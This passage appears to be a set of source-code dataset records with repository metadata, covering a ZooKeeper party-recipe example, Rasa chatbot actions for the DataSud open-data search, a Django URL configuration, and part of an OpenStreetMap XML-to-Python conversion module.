import logging import random from tornado import gen log = logging.getLogger() def arguments(parser): parser.add_argument( "--workers", "-w", type=int, default=5, help="Number of workers to launch." ) parser.add_argument( "--znode-path", "-p", type=str, default="examplelock", help="ZNode path to use for the election." ) @gen.coroutine def run(client, args): log.info("Launching %d workers.", args.workers) yield client.start() yield [ worker(i, client, args) for i in range(args.workers) ] yield client.close() @gen.coroutine def worker(number, client, args): party = client.recipes.Party(args.znode_path, "worker_%d" % number) log.info("[WORKER #%d] Joining the party", number) yield party.join() for _ in range(10): log.info("[WORKER #%d] Members I see: %s", number, party.members) yield gen.sleep(.5) should_leave = random.choice([False, False, True]) if should_leave: log.info("[WORKER #%d] Leaving the party temporarily", number) yield party.leave() yield gen.sleep(1) log.info("[WORKER #%d] Rejoining the party", number) yield party.join() yield party.leave()
1,095
0
67
15674cff063c40fbe52c1f8ea5a648cc8e393e80
20,501
py
Python
custom-actions/actions/actions.py
moreymat/conciergerie-open-data
5d7575af93dd9d7f5e2c4bd35c2f6c816d3c3d33
[ "MIT" ]
null
null
null
custom-actions/actions/actions.py
moreymat/conciergerie-open-data
5d7575af93dd9d7f5e2c4bd35c2f6c816d3c3d33
[ "MIT" ]
3
2021-09-10T15:36:06.000Z
2021-10-06T08:27:57.000Z
custom-actions/actions/actions.py
moreymat/conciergerie-open-data
5d7575af93dd9d7f5e2c4bd35c2f6c816d3c3d33
[ "MIT" ]
null
null
null
# This files contains your custom actions which can be used to run # custom Python code. # # See this guide on how to implement these action: # https://rasa.com/docs/rasa/custom-actions import json import re import numpy as np from typing import Any, Text, Dict, List from datetime import datetime from actions import api_call from rasa_sdk import Action, Tracker from rasa_sdk.executor import CollectingDispatcher from rasa_sdk.events import SlotSet, EventType, FollowupAction keywords_delimitor = " |,|;|_|\|" def levenshtein_distance(string1, string2): """compute the levenshtein distance between two words""" distances = np.zeros((len(string1) + 1, len(string2) + 1)) for s1 in range(len(string1) + 1): distances[s1][0] = s1 for s2 in range(len(string2) + 1): distances[0][s2] = s2 a = 0 b = 0 c = 0 for s1 in range(1, len(string1) + 1): for s2 in range(1, len(string2) + 1): if string1[s1 - 1] == string2[s2 - 1]: distances[s1][s2] = distances[s1 - 1][s2 - 1] else: a = distances[s1][s2 - 1] b = distances[s1 - 1][s2] c = distances[s1 - 1][s2 - 1] if a <= b and a <= c: distances[s1][s2] = a + 1 elif b <= a and b <= c: distances[s1][s2] = b + 1 else: distances[s1][s2] = c + 1 return distances[len(string1)][len(string2)] def is_keyword_already_in_search( keyword, user_search_list, exp_terms, minimal_distance=1 ): """ Input: keyword: string user_search_list: list of string exp_terms: list of string minimal_distance: int (default to 1) Return True if there is a word in user_search_list or exp_terms that has a levenshtein distance of less or equal than minimal_distance with keyword Return False if not """ flag_already_suggested = False # Check the current word isn't already proposed (or a very similar word) for suggested_keyword in exp_terms: if levenshtein_distance(keyword.lower(), suggested_keyword) <= minimal_distance: flag_already_suggested = True # Check the current word isn't already entered by the user (or a very similar word) for user_keyword in user_search_list: if ( levenshtein_distance(keyword.lower(), user_keyword.lower()) <= minimal_distance ): flag_already_suggested = True return flag_already_suggested def get_keywords_expanded_list(keywords_expanded, user_search): """ Input: keywords_expanded: Output of the expansion API user_search: search entered by the user Output: A list of keywords to display to the user Order example: [barrage éolien] - take the first keyword for barrage from the referentiel - take the first keyword for barrage from the embeddings - take the first keyword for éolien from the referentiel - take the first keyword for éolien from the embeddings - take the second keyword for barrage from the referentiel [...] Ignore words that have a levenshtein distance of less than 1 to another word already in the list: mainly to prevent plural version """ user_search_list = re.split(keywords_delimitor, user_search) for i in range(len(user_search_list)): user_search_list[i] = user_search_list[i].lower() exp_terms = [] done = False index = 0 while not done and index < 25: done = True for og_key in keywords_expanded: # loop on original keywords # Take the n°index of the referentiel og_word = og_key["referentiel"]["tags"] if og_word is not None and len(og_word) > index: # if it exist done = False for ref_tag_word in re.split(keywords_delimitor, og_word[index]): if not is_keyword_already_in_search( ref_tag_word, user_search_list, exp_terms, 1 ): exp_terms.append(ref_tag_word.lower()) # Take the n°index of the embeddings og_word = og_key["tree"][0]["similar_senses"] if og_word is not None and len(og_word) > index: # if it exist done = False for ref_tag_word in re.split( keywords_delimitor, og_word[index][0]["sense"] ): if not is_keyword_already_in_search( ref_tag_word, user_search_list, exp_terms, 1 ): exp_terms.append(ref_tag_word.lower()) index += 1 return "|".join(exp_terms) def keyword_originating_from_og_key(keyword, og_key_tree): """ Input: keyword: A keyword proposed by the expansion API og_key_tree: A tree resulting from a keyword entered by the user Output: True if keyword was proposed because of its similarity with og_key_tree["original_keyword], False if not """ if og_key_tree["referentiel"]["tags"] is not None: for keyw in og_key_tree["referentiel"]["tags"]: if keyw == keyword: return True for sense in og_key_tree["tree"]: for similar_sense in sense["similar_senses"]: if similar_sense[0]["sense"] == keyword: return True return False def process_keyword_feedback(keyword_proposed, keywords_expanded, keywords_feedback): """ Input: keyword_proposed: A keyword proposed to the user keywords_expanded: Output of the API expansion (see API doc) keywords_feedback: List of keywords chosen by the user Output: original_keywords: list of keywords that resulted in the proposition of keyword by the API feedback: wether or not keyword_proposed was chosen by the user """ original_keywords = [] for og_key_tree in keywords_expanded: if keyword_originating_from_og_key(keyword_proposed, og_key_tree): original_keywords.append(og_key_tree["original_keyword"]) if keyword_proposed in keywords_feedback: feedback = 1 else: feedback = -1 return original_keywords, feedback class ResetKeywordsSlot(Action): """ Reset all the slots of the rasa chatbot """ class AskForKeywordsFeedbackSlotAction(Action): """ Ask the user to choose which keywords are useful to him during the search_form """ class SearchKeywordsInDatabase(Action): """ Search DataSud API with keywords provided by the users and display results """ class SendSearchInfo(Action): """ Send search information to the database """ class SendKeywordsFeedback(Action): """ Send keywords proposed to the user to the database """ class FeedbackProposition(Action): """ If we found results, ask the user if he wants to give feedback """ class AskForResultsFeedbackSlotAction(Action): """ Ask the user to choose which results were useful to him """ class RecapResultsFeedback(Action): """ Feedback format example: 0 2 1 Summarize the feedback to the user """ class InitialMessage(Action): """ First message sent to user by chatbot """ class SetDatasudFlag(Action): """ Set has_asked_datasud_flag to True """ class SetCUFlag(Action): """ Set has_asked_cu_flag to True """ class AnythingElse(Action): """ Message sent to user to ask if he needs anything else """ class SendResultsFeedback(Action): """ Feedback format example: 0 3 4 Send Search results feedback to the database """ class ProposeAlternativeSearch(Action): """ Let the user know what he can do if he didn't what he needed via the chatbot. """
30.875
174
0.588801
# This files contains your custom actions which can be used to run # custom Python code. # # See this guide on how to implement these action: # https://rasa.com/docs/rasa/custom-actions import json import re import numpy as np from typing import Any, Text, Dict, List from datetime import datetime from actions import api_call from rasa_sdk import Action, Tracker from rasa_sdk.executor import CollectingDispatcher from rasa_sdk.events import SlotSet, EventType, FollowupAction keywords_delimitor = " |,|;|_|\|" def levenshtein_distance(string1, string2): """compute the levenshtein distance between two words""" distances = np.zeros((len(string1) + 1, len(string2) + 1)) for s1 in range(len(string1) + 1): distances[s1][0] = s1 for s2 in range(len(string2) + 1): distances[0][s2] = s2 a = 0 b = 0 c = 0 for s1 in range(1, len(string1) + 1): for s2 in range(1, len(string2) + 1): if string1[s1 - 1] == string2[s2 - 1]: distances[s1][s2] = distances[s1 - 1][s2 - 1] else: a = distances[s1][s2 - 1] b = distances[s1 - 1][s2] c = distances[s1 - 1][s2 - 1] if a <= b and a <= c: distances[s1][s2] = a + 1 elif b <= a and b <= c: distances[s1][s2] = b + 1 else: distances[s1][s2] = c + 1 return distances[len(string1)][len(string2)] def is_keyword_already_in_search( keyword, user_search_list, exp_terms, minimal_distance=1 ): """ Input: keyword: string user_search_list: list of string exp_terms: list of string minimal_distance: int (default to 1) Return True if there is a word in user_search_list or exp_terms that has a levenshtein distance of less or equal than minimal_distance with keyword Return False if not """ flag_already_suggested = False # Check the current word isn't already proposed (or a very similar word) for suggested_keyword in exp_terms: if levenshtein_distance(keyword.lower(), suggested_keyword) <= minimal_distance: flag_already_suggested = True # Check the current word isn't already entered by the user (or a very similar word) for user_keyword in user_search_list: if ( levenshtein_distance(keyword.lower(), user_keyword.lower()) <= minimal_distance ): flag_already_suggested = True return flag_already_suggested def get_keywords_expanded_list(keywords_expanded, user_search): """ Input: keywords_expanded: Output of the expansion API user_search: search entered by the user Output: A list of keywords to display to the user Order example: [barrage éolien] - take the first keyword for barrage from the referentiel - take the first keyword for barrage from the embeddings - take the first keyword for éolien from the referentiel - take the first keyword for éolien from the embeddings - take the second keyword for barrage from the referentiel [...] Ignore words that have a levenshtein distance of less than 1 to another word already in the list: mainly to prevent plural version """ user_search_list = re.split(keywords_delimitor, user_search) for i in range(len(user_search_list)): user_search_list[i] = user_search_list[i].lower() exp_terms = [] done = False index = 0 while not done and index < 25: done = True for og_key in keywords_expanded: # loop on original keywords # Take the n°index of the referentiel og_word = og_key["referentiel"]["tags"] if og_word is not None and len(og_word) > index: # if it exist done = False for ref_tag_word in re.split(keywords_delimitor, og_word[index]): if not is_keyword_already_in_search( ref_tag_word, user_search_list, exp_terms, 1 ): exp_terms.append(ref_tag_word.lower()) # Take the n°index of the embeddings og_word = og_key["tree"][0]["similar_senses"] if og_word is not None and len(og_word) > index: # if it exist done = False for ref_tag_word in re.split( keywords_delimitor, og_word[index][0]["sense"] ): if not is_keyword_already_in_search( ref_tag_word, user_search_list, exp_terms, 1 ): exp_terms.append(ref_tag_word.lower()) index += 1 return "|".join(exp_terms) def keyword_originating_from_og_key(keyword, og_key_tree): """ Input: keyword: A keyword proposed by the expansion API og_key_tree: A tree resulting from a keyword entered by the user Output: True if keyword was proposed because of its similarity with og_key_tree["original_keyword], False if not """ if og_key_tree["referentiel"]["tags"] is not None: for keyw in og_key_tree["referentiel"]["tags"]: if keyw == keyword: return True for sense in og_key_tree["tree"]: for similar_sense in sense["similar_senses"]: if similar_sense[0]["sense"] == keyword: return True return False def process_keyword_feedback(keyword_proposed, keywords_expanded, keywords_feedback): """ Input: keyword_proposed: A keyword proposed to the user keywords_expanded: Output of the API expansion (see API doc) keywords_feedback: List of keywords chosen by the user Output: original_keywords: list of keywords that resulted in the proposition of keyword by the API feedback: wether or not keyword_proposed was chosen by the user """ original_keywords = [] for og_key_tree in keywords_expanded: if keyword_originating_from_og_key(keyword_proposed, og_key_tree): original_keywords.append(og_key_tree["original_keyword"]) if keyword_proposed in keywords_feedback: feedback = 1 else: feedback = -1 return original_keywords, feedback class ResetKeywordsSlot(Action): """ Reset all the slots of the rasa chatbot """ def name(self): return "action_reset_all_slots" def run(self, dispatcher, tracker, domain): return [ SlotSet("keywords", None), SlotSet("keywords_expanded", None), SlotSet("keywords_feedback", None), SlotSet("results", None), SlotSet("results_feedback", None), SlotSet("search_target_feedback", None), ] class AskForKeywordsFeedbackSlotAction(Action): """ Ask the user to choose which keywords are useful to him during the search_form """ def name(self) -> Text: return "action_ask_keywords_feedback" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict ) -> List[EventType]: user_search = tracker.get_slot("keywords") keywords_expanded = api_call.get_keywords_expansion_query( user_search, [{"name": "datasud", "type": "tags"}] ) keywords_expanded_list = get_keywords_expanded_list( keywords_expanded, user_search ) if len(keywords_expanded_list) > 0: keywords = [ {"content_type": "text", "title": x, "payload": "k" + str(i)} for i, x in enumerate( re.split(keywords_delimitor, keywords_expanded_list) ) ] # Le custom payload est détecté comme un texte, donc j'ajoute un type qui permet facilement de détecter que c'est un un custom payload au niveau du widget payload = { "type": "custom_payload_keywords", "text": "Voici quelques mots-clés supplémentaires. Cliquez sur ceux qui vous semblent pertinents, puis appuyez sur entrée, pour approfondir votre recherche.", "nb_max_keywords": 8, "keywords": keywords, } dispatcher.utter_message(json.dumps(payload)) return [ SlotSet("keywords_expanded", keywords_expanded), SlotSet("keywords_proposed", keywords_expanded_list), ] else: return [ SlotSet("keywords_expanded", ""), SlotSet("keywords_proposed", ""), SlotSet("keywords_feedback", ""), SlotSet("requested_slot", None), ] class SearchKeywordsInDatabase(Action): """ Search DataSud API with keywords provided by the users and display results """ def name(self): return "action_search_database" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> List[Dict[Text, Any]]: keywords = tracker.get_slot("keywords") conversation_id = tracker.sender_id keywords_feedback = tracker.get_slot("keywords_feedback") results = api_call.get_results_from_keywords(keywords, keywords_feedback, 5) reranking_data = [] reranking_data.append({"api_hostname": "datasud", "results_list": results}) catalog_url = "https://trouver.datasud.fr/dataset/" if len(results) > 0: results = api_call.get_search_reranking_query( conversation_id, keywords, reranking_data ) results_payload = [] for i, result in enumerate(results[0:5]): results_payload.append( { "title": result["title"], "author": result["owner_org"], "url": catalog_url + result["url"], "description": result["description"], } ) dispatcher.utter_message(text="Voici les résultats que j'ai pu trouver :") payload = { "type": "custom_payload_results_display", "nb_max_results": 5, "results": results_payload, } dispatcher.utter_message(json.dumps(payload)) return [ SlotSet("results", results), ] else: dispatcher.utter_message( text="Je suis désolé, je n'ai trouvé aucun résultat pour votre recherche." ) return [ SlotSet("results", None), ] class SendSearchInfo(Action): """ Send search information to the database """ def name(self): return "action_send_search_information_to_API" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> List[Dict[Text, Any]]: date = datetime.now().strftime("%Y-%m-%d %H:%M:%S") api_call.add_expansion_search_query( tracker.sender_id, tracker.get_slot("keywords"), date ) api_call.add_reranking_search_query( tracker.sender_id, tracker.get_slot("keywords"), date ) class SendKeywordsFeedback(Action): """ Send keywords proposed to the user to the database """ def name(self): return "action_send_keywords_feedback_to_expansion_API" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> List[Dict[Text, Any]]: keywords_expanded = tracker.get_slot("keywords_expanded") keywords_proposed = tracker.get_slot("keywords_proposed") keywords_feedback = tracker.get_slot("keywords_feedback") feedbacks_list = [] if keywords_proposed is not None and keywords_feedback is not None: keywords_proposed = re.split(keywords_delimitor, keywords_proposed) keywords_feedback = re.split(keywords_delimitor, keywords_feedback) for keyword in keywords_proposed: original_keywords, feedback = process_keyword_feedback( keyword, keywords_expanded, keywords_feedback ) for og_keyword in original_keywords: feedbacks_list.append( { "original_keyword": og_keyword, "proposed_keyword": keyword, "feedback": feedback, } ) api_call.add_expansion_feedback_query( tracker.sender_id, tracker.get_slot("keywords"), feedbacks_list ) class FeedbackProposition(Action): """ If we found results, ask the user if he wants to give feedback """ def name(self): return "action_feedback_proposition" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> List[Dict[Text, Any]]: yesnoButtons = [ {"payload": "/affirm", "title": "Oui !"}, {"payload": "/deny", "title": "Non merci",}, ] results = tracker.get_slot("results") if results != None and len(results) > 0: dispatcher.utter_message( text="Seriez-vous d'accord de prendre quelques secondes de votre temps pour m'aider à m'améliorer ?", buttons=yesnoButtons, ) else: # return {"event": "followup", "name": "action_recap_feedback_to_user"} return [FollowupAction("utter_submit_feedback_form")] class AskForResultsFeedbackSlotAction(Action): """ Ask the user to choose which results were useful to him """ def name(self) -> Text: return "action_ask_results_feedback" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict ) -> List[EventType]: results = tracker.get_slot("results") feedback_payload = [] catalog_url = "https://trouver.datasud.fr/dataset/" for i, result in enumerate(results[0:5]): feedback_payload.append( { "title": result["title"], "author": result["owner_org"], "url": catalog_url + result["url"], "description": result["description"], } ) dispatcher.utter_message( text="Veuillez cocher les résultats qui vous ont étés utiles :" ) payload = { "type": "custom_payload_feedbacks_display", "nb_max_feedbacks": 5, "feedbacks": feedback_payload, } dispatcher.utter_message(json.dumps(payload)) class RecapResultsFeedback(Action): """ Feedback format example: 0 2 1 Summarize the feedback to the user """ def name(self): return "action_recap_feedback_to_user" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> List[Dict[Text, Any]]: dispatcher.utter_message(text="Merci beaucoup pour votre retour !") class InitialMessage(Action): """ First message sent to user by chatbot """ def name(self): return "action_initial_message" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> List[Dict[Text, Any]]: propositions = [ {"payload": "/request_search", "title": "Je recherche des données."}, { "payload": "/ask_datasud", "title": "J'aimerais en savoir plus sur Datasud.", }, { "payload": "/ask_cu", "title": "Je voudrais connaître les conditions d'utilisation.", }, {"payload": "/goodbye", "title": "Je n'ai besoin de rien."}, ] dispatcher.utter_message( text="Bonjour, comment puis-je vous aider ?", buttons=propositions ) class SetDatasudFlag(Action): """ Set has_asked_datasud_flag to True """ def name(self): return "action_set_datasud_flag" def run(self, dispatcher, tracker, domain): return [ SlotSet("has_asked_datasud_flag", True), ] class SetCUFlag(Action): """ Set has_asked_cu_flag to True """ def name(self): return "action_set_cu_flag" def run(self, dispatcher, tracker, domain): return [ SlotSet("has_asked_cu_flag", True), ] class AnythingElse(Action): """ Message sent to user to ask if he needs anything else """ def name(self): return "action_anything_else" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> List[Dict[Text, Any]]: has_asked_datasud_flag = tracker.get_slot("has_asked_datasud_flag") has_asked_cu_flag = tracker.get_slot("has_asked_cu_flag") propositions = [] propositions.append( {"payload": "/request_search", "title": "Je recherche des données."} ) if not has_asked_datasud_flag: propositions.append( { "payload": "/ask_datasud", "title": "J'aimerais en savoir plus sur Datasud.", } ) if not has_asked_cu_flag: propositions.append( { "payload": "/ask_cu", "title": "Je voudrais connaître les conditions d'utilisation.", } ) propositions.append({"payload": "/goodbye", "title": "Je n'ai besoin de rien."}) dispatcher.utter_message( text="Avez-vous besoin d'autre chose ?", buttons=propositions ) class SendResultsFeedback(Action): """ Feedback format example: 0 3 4 Send Search results feedback to the database """ def name(self): return "action_send_results_feedback_to_reranking_API" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> List[Dict[Text, Any]]: conversation_id = tracker.sender_id user_search = tracker.get_slot("keywords") results = tracker.get_slot("results") search_target_feedback = tracker.get_slot("search_target_feedback") results_feedback = tracker.get_slot("results_feedback") if results_feedback is not None: results_feedback = results_feedback.split(" ") else: results_feedback = [] feedbacks_list = [] if results is not None and len(results) > 0: if len(results_feedback) > 0: for i, result in enumerate(results): if str(i) in results_feedback: feedbacks_list.append({"result": result, "feedback": 1}) else: feedbacks_list.append({"result": result, "feedback": -1}) else: for i, result in enumerate(results): feedbacks_list.append({"result": result, "feedback": 0}) api_call.add_reranking_feedback_query( conversation_id, user_search, search_target_feedback, feedbacks_list, ) class ProposeAlternativeSearch(Action): """ Let the user know what he can do if he didn't what he needed via the chatbot. """ def name(self): return "action_data_not_found" def run( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> List[Dict[Text, Any]]: user_search = tracker.get_slot("keywords") print(keywords_delimitor, user_search) classic_search_link = "https://trouver.datasud.fr/dataset?q=" + "&&".join( re.split(keywords_delimitor, user_search) ) dispatcher.utter_message( response="utter_data_not_found", classic_search_link=classic_search_link ) dispatcher.utter_message(response="utter_contact_datasud")
11,868
0
756
8b90a4f43bd5093ec4d3568f8c57eccff8dc5136
1,580
py
Python
ea_makers_be/ea_makers_app/urls.py
kimtuan1102/ea_makers_be
509b21bc2b444bfe5be252acbbc4340be2439104
[ "MIT" ]
null
null
null
ea_makers_be/ea_makers_app/urls.py
kimtuan1102/ea_makers_be
509b21bc2b444bfe5be252acbbc4340be2439104
[ "MIT" ]
1
2021-06-10T23:12:09.000Z
2021-06-10T23:12:09.000Z
ea_makers_be/ea_makers_app/urls.py
kimtuan1102/ea_makers_be
509b21bc2b444bfe5be252acbbc4340be2439104
[ "MIT" ]
null
null
null
from django.urls import path, include from rest_framework.routers import DefaultRouter from .views import TransactionViewSet, AccountMT4ViewSet, AccountHistoryViewSet, \ AccountConfigViewSet, transaction_approve, transaction_reject, user_info, ea_license, PackageViewSet, \ ServerInfoViewSet, account_config_admin_approve, create_order, \ account_config_superadmin_approve, OfficeViewSet, extension_order, license_time, \ guarantee_time, ChangePasswordView router = DefaultRouter() router.register(r'transaction', TransactionViewSet) router.register(r'account-mt4', AccountMT4ViewSet) router.register(r'account-history', AccountHistoryViewSet) router.register(r'account-config', AccountConfigViewSet) router.register(r'package', PackageViewSet) router.register(r'server-info', ServerInfoViewSet) router.register(r'office', OfficeViewSet) urlpatterns = [ path('api/', include(router.urls)), path(r'api/transaction/approve/<int:id>', transaction_approve), path(r'api/transaction/reject/<int:id>', transaction_reject), path(r'api/user-info', user_info), path(r'api/ea-license/<int:id>', ea_license), path(r'api/account-config/admin-approve/<int:id>', account_config_admin_approve), path(r'api/account-config/superadmin-approve/<int:id>', account_config_superadmin_approve), path(r'api/create-order', create_order), path(r'api/extension-order/<int:id>', extension_order), path(r'api/license-time', license_time), path(r'api/guarantee-time', guarantee_time), path(r'api/change-password', ChangePasswordView.as_view()) ]
50.967742
107
0.779114
from django.urls import path, include from rest_framework.routers import DefaultRouter from .views import TransactionViewSet, AccountMT4ViewSet, AccountHistoryViewSet, \ AccountConfigViewSet, transaction_approve, transaction_reject, user_info, ea_license, PackageViewSet, \ ServerInfoViewSet, account_config_admin_approve, create_order, \ account_config_superadmin_approve, OfficeViewSet, extension_order, license_time, \ guarantee_time, ChangePasswordView router = DefaultRouter() router.register(r'transaction', TransactionViewSet) router.register(r'account-mt4', AccountMT4ViewSet) router.register(r'account-history', AccountHistoryViewSet) router.register(r'account-config', AccountConfigViewSet) router.register(r'package', PackageViewSet) router.register(r'server-info', ServerInfoViewSet) router.register(r'office', OfficeViewSet) urlpatterns = [ path('api/', include(router.urls)), path(r'api/transaction/approve/<int:id>', transaction_approve), path(r'api/transaction/reject/<int:id>', transaction_reject), path(r'api/user-info', user_info), path(r'api/ea-license/<int:id>', ea_license), path(r'api/account-config/admin-approve/<int:id>', account_config_admin_approve), path(r'api/account-config/superadmin-approve/<int:id>', account_config_superadmin_approve), path(r'api/create-order', create_order), path(r'api/extension-order/<int:id>', extension_order), path(r'api/license-time', license_time), path(r'api/guarantee-time', guarantee_time), path(r'api/change-password', ChangePasswordView.as_view()) ]
0
0
0
c84be1fd2203937f1b01a3ed6d022fb5c41f653d
14,418
py
Python
osmdigest/pythonify.py
MatthewDaws/OSMDigest
aba65c4bf28b14e123711f760bf0baf1be2e82c5
[ "MIT" ]
null
null
null
osmdigest/pythonify.py
MatthewDaws/OSMDigest
aba65c4bf28b14e123711f760bf0baf1be2e82c5
[ "MIT" ]
null
null
null
osmdigest/pythonify.py
MatthewDaws/OSMDigest
aba65c4bf28b14e123711f760bf0baf1be2e82c5
[ "MIT" ]
null
null
null
""" pythonify ~~~~~~~~ Converts an OSM XML file into a number of Python dictionaries. This process is slow, and (very) memory intensive, so can be split into a number of parts. We also support saving and loading the results from compressed pickle'd files (these should be viewed a temporary files, which are unlikely to be compatible across different Python runtime systems.) """ from . import digest as _digest import pickle as _pickle import lzma as _lzma import array as _array import bisect as _bisect from collections import defaultdict as _defaultdict def unpickle(filename): """Load an object from a .xz compressed pickle file.""" with _lzma.open(filename, "rb") as file: return _pickle.load(file) def pickle(object, filename): """Save an object to a .xz compressed pickle file.""" with _lzma.open(filename, "wb") as file: return _pickle.dump(object, file) class Nodes(): """Extracts the coordinate data (only) for the nodes. Stores data in a dictionary. :param file: Construct from the filename or file-like object; can be anything which :module:`digest` can parse. :param fast: If True (default) then assume the input XML file is organised so that all nodes occur first, then all ways, and then all relations. """ class NodesPacked(): """A more efficient storage method than the :class:`Nodes` implements, but at the cost of slower querying. :param file: Construct from the filename or file-like object; can be anything which :module:`digest` can parse.untitled0.py :param fast: If True (default) then assume the input XML file is organised so that all nodes occur first, then all ways, and then all relations. """ @staticmethod @staticmethod @staticmethod def from_Nodes(nodes): """Construct a new instance from an instance of :class:`Nodes`.""" new = NodesPacked(None) interim_list = [ (osm_id, lon, lat) for osm_id, (lon, lat) in nodes._nodes.items() ] new._osm_ids, new._longitude, new._latitude = NodesPacked._arrays_from_unordered_list(interim_list) return new class Ways(): """Extracts (only) the list of nodes for each way. :param file: Construct from the filename or file-like object; can be anything which :module:`digest` can parse.untitled0.py :param fast: If True (default) then assume the input XML file is organised so that all nodes occur first, then all ways, and then all relations. """ class Relations(): """Extracts (only) the list of members of each relation. :param file: Construct from the filename or file-like object; can be anything which :module:`digest` can parse.untitled0.py :param fast: If True (default) then assume the input XML file is organised so that all nodes occur first, then all ways, and then all relations. """ class Tags(): """Stores all the tags in a lookup optimised for finding the objects (nodes, ways and relations) which have a given tag. :param file: Construct from the filename or file-like object; can be anything which :module:`digest` can parse. """ @staticmethod @staticmethod @property def all_node_tags(self): """Set of all `(key, value)` pairs of tags of nodes.""" return set(self.from_nodes) @property def all_node_tag_keys(self): """Set of all keys which occur on tags of nodes.""" return set(k for (k,v) in self.from_nodes) @property def all_way_tags(self): """Set of all `(key, value)` pairs of tags of ways.""" return set(self.from_ways) @property def all_way_tag_keys(self): """Set of all keys which occur on tags of ways.""" return set(k for (k,v) in self.from_ways) @property def all_relation_tags(self): """Set of all `(key, value)` pairs of tags of relations.""" return set(self.from_relations) @property def all_relation_tag_keys(self): """Set of all keys which occur on tags of relations.""" return set(k for (k,v) in self.from_relations) def from_key_value(self, key, value): """Return a list of all element which have the tag `{key: value}`. :param key: The key to search for tags with. :param value: The value to search for tags with. :return: A list of pairs `(typename, osm_id)` where `typename` is one of "node", "way" or "relation" and `osm_id` is the id of the element. """ out = [] for osm_id in self.nodes((key, value)): out.append(("node", osm_id)) for osm_id in self.ways((key, value)): out.append(("way", osm_id)) for osm_id in self.relations((key, value)): out.append(("relation", osm_id)) return out def from_key(self, key): """Return a list of all element which have the tag `key`. :param key: The key to search for tags with. :return: A list of triple `(typename, value, osm_id)` where `typename` is one of "node", "way" or "relation", `value` is the value of the tag, and `osm_id` is the id of the element. """ out = [] for value, osm_id in self.nodes_from_key(key): out.append(("node", value, osm_id)) for value, osm_id in self.ways_from_key(key): out.append(("way", value, osm_id)) for value, osm_id in self.relations_from_key(key): out.append(("relation", value, osm_id)) return out def nodes(self, key_pair): """Returns a list of all the nodes which have the tag `{key: value}`. :param key_pair: `(key, value)` of tag to search for. :return: list, maybe empty, of ids of nodes with this tag. """ return self._by_key_pair(self.from_nodes, key_pair) def nodes_from_key(self, key): """Returns a list of all the nodes which have the tag key. :param key: The key of tags to search for. :return: list, maybe empty, of pairs `(value, id)` where `value` is the value from the tag, and `id` is osm id of the node. """ return self._by_key(self.from_nodes, key) def ways(self, key_pair): """Returns a list of all the ways which have the tag `{key: value}`. :param key_pair: `(key, value)` of tag to search for. :return: list, maybe empty, of ids of ways with this tag. """ return self._by_key_pair(self.from_ways, key_pair) def ways_from_key(self, key): """Returns a list of all the ways which have the tag key. :param key: The key of tags to search for. :return: list, maybe empty, of pairs `(value, id)` where `value` is the value from the tag, and `id` is osm id of the way. """ return self._by_key(self.from_ways, key) def relations(self, key_pair): """Returns a list of all the relations which have the tag `{key: value}`. :param key_pair: `(key, value)` of tag to search for. :return: list, maybe empty, of ids of relations with this tag. """ return self._by_key_pair(self.from_relations, key_pair) def relations_from_key(self, key): """Returns a list of all the relations which have the tag key. :param key: The key of tags to search for. :return: list, maybe empty, of pairs `(value, id)` where `value` is the value from the tag, and `id` is osm id of the relation. """ return self._by_key(self.from_relations, key) class TagsById(): """A lookup from osm id number to tags. :param tags: An instance of :class:`Tags`. """ @staticmethod def node(self, osm_id): """Return a (possibly empty) dictionary of tags for the node with this id. """ if osm_id in self._nodes: return self._nodes[osm_id] return dict() def way(self, osm_id): """Return a (possibly empty) dictionary of tags for the node with this id. """ if osm_id in self._ways: return self._ways[osm_id] return dict() def relation(self, osm_id): """Return a (possibly empty) dictionary of tags for the node with this id. """ if osm_id in self._relations: return self._relations[osm_id] return dict() def pythonify_and_pickle(file, out_filename): """Convert all the data in the XML file and save as pickled files for nodes, ways, relations and tags separately. :param file: Filename (the file will be opened 4 times, so passing a file object will not work). Can be anything which :module:`digest` can parse. :param out_filename: If is `test` then writes files `test_nodes.pic.xz` through `test_tags.pic.xz` :return: A tuple of the 4 output filenames for nodes, ways, relations and tags. """ obj = NodesPacked(file) out = [out_filename + "_nodes.pic.xz"] pickle(obj, out[0]) for typpe, name in [(Ways, "ways"), (Relations, "relations"), (Tags, "tags")]: obj = None obj = typpe(file) name = "{}_{}.pic.xz".format(out_filename, name) pickle(obj, name) out.append(name) return out
36.593909
107
0.608337
""" pythonify ~~~~~~~~ Converts an OSM XML file into a number of Python dictionaries. This process is slow, and (very) memory intensive, so can be split into a number of parts. We also support saving and loading the results from compressed pickle'd files (these should be viewed a temporary files, which are unlikely to be compatible across different Python runtime systems.) """ from . import digest as _digest import pickle as _pickle import lzma as _lzma import array as _array import bisect as _bisect from collections import defaultdict as _defaultdict def unpickle(filename): """Load an object from a .xz compressed pickle file.""" with _lzma.open(filename, "rb") as file: return _pickle.load(file) def pickle(object, filename): """Save an object to a .xz compressed pickle file.""" with _lzma.open(filename, "wb") as file: return _pickle.dump(object, file) def _all_elements(file): gen = _digest.parse(file) osm, bounds = next(gen), next(gen) if not isinstance(osm, _digest.OSM) or not isinstance(bounds, _digest.Bounds): raise Exception("Unexpected initial two elements. Has the XML file format changed?") yield from gen def _all_elements_of_type(file, typename, fast=True): if not fast: yield from (element for element in _all_elements(file) if element.name == typename ) else: for element in _all_elements(file): if element.name == typename: yield element else: if typename == "node": return elif typename == "way" and element.name == "relation": return class Nodes(): """Extracts the coordinate data (only) for the nodes. Stores data in a dictionary. :param file: Construct from the filename or file-like object; can be anything which :module:`digest` can parse. :param fast: If True (default) then assume the input XML file is organised so that all nodes occur first, then all ways, and then all relations. """ def __init__(self, file, fast=True): self._nodes = dict() for node in _all_elements_of_type(file, "node", 